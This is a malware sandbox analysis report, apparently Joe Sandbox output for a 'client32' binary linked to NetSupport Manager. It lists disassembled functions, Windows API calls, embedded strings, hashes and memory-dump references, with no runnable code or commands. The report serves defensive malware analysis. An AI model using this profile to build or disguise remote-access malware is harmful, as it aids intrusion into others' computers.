                                                                                  • Instruction ID: 29a85e5adb823bcef9c03dae075ae2b4ea3bdd8fdf15b4c5e271eae4de8d38be
                                                                                  • Opcode Fuzzy Hash: 1515c5a980bb63e1af7bf7099e432547b006d5e2aeed3d9808fec87a56ded119
                                                                                  • Instruction Fuzzy Hash: DF118E7170423A9BDB05CFA9CD90AAAF7BCEB4C708B00047DE511D3244EBB2E958CB50
                                                                                  Function 11005940 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 11005981
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 110059BC
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastMessageProcessReleasewsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 3704029381-2830328467
                                                                                  • Opcode ID: c633f50c0fdfeb7c59634bf7decd603260c8dc5fded95eba86501058678fa527
                                                                                  • Instruction ID: 1cf781a21872bd9441bcd9bb2c78fcf7fe1041f1c585c9da4a5e29128da7e192
                                                                                  • Opcode Fuzzy Hash: c633f50c0fdfeb7c59634bf7decd603260c8dc5fded95eba86501058678fa527
                                                                                  • Instruction Fuzzy Hash: 8C21E475A00705AFE710CB61C880BEBB7E4BF8A358F10407DE5AA4B240DB72A440CBA1
                                                                                  Function 1105D500 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,1103FE35,?,?,Client,DisableThumbnail,00000000,00000000,Client,DisableWatch,00000000,00000000), ref: 1105D51E
                                                                                  • LeaveCriticalSection.KERNEL32(00000000,?,DisableWatch,00000000,00000000,50D94AA1), ref: 1105D59E
                                                                                  • SetEvent.KERNEL32(?,?,DisableWatch,00000000,00000000,50D94AA1), ref: 1105D5A8
                                                                                  Strings
                                                                                  • Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d, xrefs: 1105D561
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterEventLeave
                                                                                  • String ID: Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d
                                                                                  • API String ID: 3094578987-11999416
                                                                                  • Opcode ID: c530e27155f7b3fdc2e9ca538483d963ca7dcdd1017b1d5184d653da29544702
                                                                                  • Instruction ID: cd8e2c595cb3ca955c0a05eca4a83294a9fb2b4bfc4f95d4b2967c0930ade923
                                                                                  • Opcode Fuzzy Hash: c530e27155f7b3fdc2e9ca538483d963ca7dcdd1017b1d5184d653da29544702
                                                                                  • Instruction Fuzzy Hash: 6D2149B4500B65AFD364CF6AC490967FBF4FF88718700891EE5AA82B41E375F850CBA0
                                                                                  Function 110B9680 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B969F
                                                                                  • MoveWindow.USER32(8D111949,?,?,?,?,00000001,?,?,?,?,?,?,?,?,?,110BA885), ref: 110B96D8
                                                                                  • SetTimer.USER32(8D111949,0000050D,000007D0,00000000), ref: 110B9710
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InfoMoveParametersSystemTimerWindow
                                                                                  • String ID: Max
                                                                                  • API String ID: 1521622399-2772132969
                                                                                  • Opcode ID: ec225463a539bc69afd1be9fe60c0d6d77afb2bfb6e5901e1a463c37379c6f26
                                                                                  • Instruction ID: 87ccea237e2aa79ae125a3322bdb2c24729383307459d143463b3682e3a222a8
                                                                                  • Opcode Fuzzy Hash: ec225463a539bc69afd1be9fe60c0d6d77afb2bfb6e5901e1a463c37379c6f26
                                                                                  • Instruction Fuzzy Hash: A2213DB5A40309AFD714DFA4C885FAFF7B8EB48710F10452EE96597380CB70A941CBA0
                                                                                  Function 11153570 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memmove.LIBCMT ref: 111535AC
                                                                                  • _memmove.LIBCMT ref: 111535E6
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _memmove$ErrorExitLastMessageProcesswsprintf
                                                                                  • String ID: ..\ctl32\WCUNPACK.C$n > 128
                                                                                  • API String ID: 6605023-1396654219
                                                                                  • Opcode ID: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
                                                                                  • Instruction ID: 7dc9b17917a05d0a1a20c6fa4ac0eb705d74e08118df21bf74e35568faeb592c
                                                                                  • Opcode Fuzzy Hash: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
                                                                                  • Instruction Fuzzy Hash: 0A1125B6C3916577C3818E6A9D85A9BFB68BB4236CF048115FCB817241E771A614C7E0
                                                                                  Function 110395A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(00000000,00000001), ref: 110395E6
                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 110395EE
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                  • API String ID: 1136984157-1986719024
                                                                                  • Opcode ID: 9301bb4a703dc9f718e6a03bc63426bc399485c21c7871a03d02741ec2ccad78
                                                                                  • Instruction ID: 55b3f6273447a840922a2276b3415970a39c2bc3f54fc53508d86eb1e8118ba0
                                                                                  • Opcode Fuzzy Hash: 9301bb4a703dc9f718e6a03bc63426bc399485c21c7871a03d02741ec2ccad78
                                                                                  • Instruction Fuzzy Hash: C3F0C876640219BFD710CE55DCC6F9BB39CEB88754F108425F61597280D6B1E84087A4
                                                                                  Function 11015400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 110AB01D
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                  • String ID: ..\ctl32\liststat.cpp$..\ctl32\listview.cpp$m_hWnd
                                                                                  • API String ID: 819365019-2727927828
                                                                                  • Opcode ID: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
                                                                                  • Instruction ID: c68bebcfb275c132091ba8ffe4505af5196cb7164de974b36e44453814cc3cc0
                                                                                  • Opcode Fuzzy Hash: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
                                                                                  • Instruction Fuzzy Hash: 4DF02B34FC0720AFD720D581EC42FCAB3D4AB05709F004469F5562A2D1E5B0B8C0C7D1
                                                                                  Function 110ED470 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsWindow.USER32(?), ref: 110ED498
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastMessageProcessWindowwsprintf
                                                                                  • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
                                                                                  • API String ID: 2577986331-1331251348
                                                                                  • Opcode ID: 7e39479067b6c5f95eacce72c06cd62ac8a6f0ae8e6ec8608ac651044464dd8e
                                                                                  • Instruction ID: 93283a680bb1c801d139a1839617fb2f1f19efec68c8bcedb592c4b0da2aa86f
                                                                                  • Opcode Fuzzy Hash: 7e39479067b6c5f95eacce72c06cd62ac8a6f0ae8e6ec8608ac651044464dd8e
                                                                                  • Instruction Fuzzy Hash: 8DF0E279E036327BD612A9177C0AFCFF768DBA1AA9F058061F80D26101EB34720082E9
                                                                                  Function 1103F4C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F466
                                                                                    • Part of subcall function 1103F450: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F47C
                                                                                    • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F484
                                                                                    • Part of subcall function 1103F450: Sleep.KERNEL32(00000014), ref: 1103F497
                                                                                    • Part of subcall function 1103F450: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F4A7
                                                                                    • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F4AF
                                                                                  • IsWindow.USER32(00000000), ref: 1103F4EA
                                                                                  • SendMessageA.USER32(00000000,0000004A,00000000,00000501), ref: 1103F4FD
                                                                                  Strings
                                                                                  • DoMMData - could not find %s window, xrefs: 1103F50D
                                                                                  • PCIVideoSlave32, xrefs: 1103F508
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$Find$MessageSendSleep
                                                                                  • String ID: DoMMData - could not find %s window$PCIVideoSlave32
                                                                                  • API String ID: 1010850397-3146847729
                                                                                  • Opcode ID: aae4a453ef0a99841fb0c8f2bdb4662e73cf68ed11950b93a08a3e71c3a39851
                                                                                  • Instruction ID: 9c7747beff98129d0e206a6ba61550f1bc8c1a2fc0044bc1d9efbb7d24d88507
                                                                                  • Opcode Fuzzy Hash: aae4a453ef0a99841fb0c8f2bdb4662e73cf68ed11950b93a08a3e71c3a39851
                                                                                  • Instruction Fuzzy Hash: BBF02735E8121C77D710AA98AC0ABEEBB689B0170EF004098ED1966280EBB5251087DB
                                                                                  Function 11081680 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 110816D7
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastMessageProcess_freewsprintf
                                                                                  • String ID: ..\CTL32\DataStream.cpp$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                  • API String ID: 2441568934-1875806619
                                                                                  • Opcode ID: 447824e72cda998df234909720421efff22f71a3ff5c8715bed7def871f972f3
                                                                                  • Instruction ID: 681d8586094b0eb4f99e23d602ddbaf233b7ff3414f9fb7bc0106feac7c5022a
                                                                                  • Opcode Fuzzy Hash: 447824e72cda998df234909720421efff22f71a3ff5c8715bed7def871f972f3
                                                                                  • Instruction Fuzzy Hash: E8F027B8F083221FEA30DE54BC02BC9F7D01F0824CF080494E9C327240E7B26818C6E2
                                                                                  Function 1103D1F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,762323A0,1100BF7B), ref: 11110928
                                                                                    • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935
                                                                                  • _free.LIBCMT ref: 1103D221
                                                                                    • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                    • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                    • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010,?), ref: 11110970
                                                                                  • SetPriorityClass.KERNEL32(?,?), ref: 1103D24C
                                                                                  • MessageBeep.USER32(00000000), ref: 1103D25E
                                                                                  Strings
                                                                                  • Show has overrun too much, aborting, xrefs: 1103D1F1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
